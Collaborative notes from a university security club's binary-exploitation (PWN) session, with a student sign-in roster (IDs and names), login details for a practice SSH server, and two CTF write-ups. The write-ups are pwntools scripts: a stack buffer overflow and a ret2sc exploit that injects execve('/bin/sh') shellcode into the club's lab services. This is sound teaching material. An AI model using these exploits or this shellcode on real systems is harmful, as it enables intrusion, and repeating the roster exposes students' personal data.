1082 第三次社課 === ###### tags: `1082` :::success 線上簽到： B073040047 楊志璿 M063040085 謝承翰 B073040032 涂哲誠 B063040059 陳縵欣 B053022059 蔣有為 B073040050 翁昌閔 B063040013 李洳瑄 B073040019 蔡孟師 M073040039 簡振宇 M083140014 黃晏林 M083040031 許雅雯 B083040021 嚴宇同 B063040027 林浩陽 B083040014 陳昱維 M083140005 曾煜鈞 ::: :::danger 今天要紙本簽到ㄛ(填座位表) ::: # 主題 PWN (二) 投影片連結： [slide](https://drive.google.com/open?id=1YZc8QhpqgupcxGPuID10PAHnNNxNBdg4) ctf.macaca.cool ssh -p 3000 user{index}@pwn.macaca.cool p4ssw0rd_{index} index是1~40 # 共筆 ## 第一步 查看保護 ``` $ checksec ${File} ``` 查看ELF的反組譯 ``` $ objdump -d ./bof ``` Google: shellcode x86 linux --- 頁尾交流區 >只有我的廣播的滑鼠位置很怪ㄇ，滑鼠位置對不上欸QQ >>真的只有我喔QQ >不是只有你 >問個 objdump -d filename 和 objdump -d ./filename 有差ㄇ，執行起來好像沒差 >>沒差喔 writeups --- ### bof ```python= from pwn import * shell_addr = 0x080484eb payload = 'a' * 0x34 + p32(shell_addr) r = remote("pwn.macaca.cool", 10000) r.sendlineafter('Input: ', payload) r.interactive() ``` ### ret2sc ```python= from pwn import * buf = 0x804a060 shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" payload = "a" * 8 + p32(buf) r = remote("pwn.macaca.cool", 10004) r.sendlineafter("What's your name? ", payload) r.sendlineafter("Input: ", shellcode) r.interactive() ``` > [name=吃瓜助教] 很棒